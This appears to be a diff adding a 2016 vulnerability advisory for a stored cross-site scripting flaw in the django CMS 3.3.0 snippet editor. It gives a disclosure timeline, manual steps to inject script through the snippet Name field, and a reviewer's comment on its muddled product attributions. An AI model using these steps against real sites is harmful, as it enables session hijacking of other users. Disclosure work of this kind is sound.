Content Management System. 
+ + +Vulnerability Disclosure Timeline: +================================== +2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) +2016-07-04 Vendor Notification (Django Security Team) +2016-07-07: Vendor Response/Feedback (Django Security Team) +2016-07-18: Vendor Fix/Patch (Django Service Developer Team) +2016-07-19: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Divio AG +Product: Django Framework - Content Management System 3.3.0 + +Divio AG +Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System. +The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the +application-side of the vulnerable modules web context. + +The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request. +Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution. +The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/` +data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any +payload inside of the option tag. + +The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST. 
+The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already +existing snippets on add. + +Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in +the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped. + +The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. +Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction. +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external +redirects to malicious source and persistent manipulation of affected or connected application modules. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Editor - Snippets (Add) + +Vulnerable Input(s): + [+] Name + +Parameter(s): + [+] select + +Affected Module(s): + [+] Snippets Options Listing [./djangocms_snippet/snippet/] - option + + +Proof of Concept (PoC): +======================= +The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction. +For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Login to your django cms website with version 3.3.0 +2. Open the structure module +3. Click to edit a page module +Note: Now the editor opens with the main default plugins +4. Mark a text passage and click to the code snippets plugin that is configured by default installation +5. Click the plus to add a new snippet of code +6. Inject a script code payload in java-script to the input field of the Name +7. Save the entry iva POST method request +8. 
Now click the box to choose the vulnerable injected payload +9. The script code payload executes in the box listing without secure parse or filter to encode +10. Successful reproduce of the application-side validation vulnerability in the editors snippet module! + +Note: +Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet +the stable saved categories provoke the execution of the payload. + + + +PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) + + + +
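Review bot: the advisory in 40129.txt mixes two products and should state plainly which component carries CVE-2016-6186 and where the fix shipped. The title and `Technical Details` call the affected software `Django v3.3.0 Content Management System`, the `Affected Product(s)` block attributes `Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7` to Divio AG (with `MDB` left unexplained), while the cited security release (djangoproject.com, 2016-07-18) and the timeline entry `Vendor Fix/Patch (Django Service Developer Team)` point at the Django project rather than django CMS, so a reader cannot tell whether upgrading django CMS 3.3.0 alone resolves the issue. Smaller points: the timeline entry `2016-07-04 Vendor Notification` is missing its colon; `iva` in step 7 should be `via`; `Parameter(s): select` and `Affected Module(s): ... - option` name the rendering context rather than a request parameter (the `Name` field is the input); and the PoC markup after `Execution Point` is absent from this hunk. The detail that the stored value is escaped in the frontend and in edit mode but not in the snippet option listing is the useful triage fact: exposure is limited to users who open the snippet chooser in the editor, which also bounds who needs to be warned while the upgrade is rolled out.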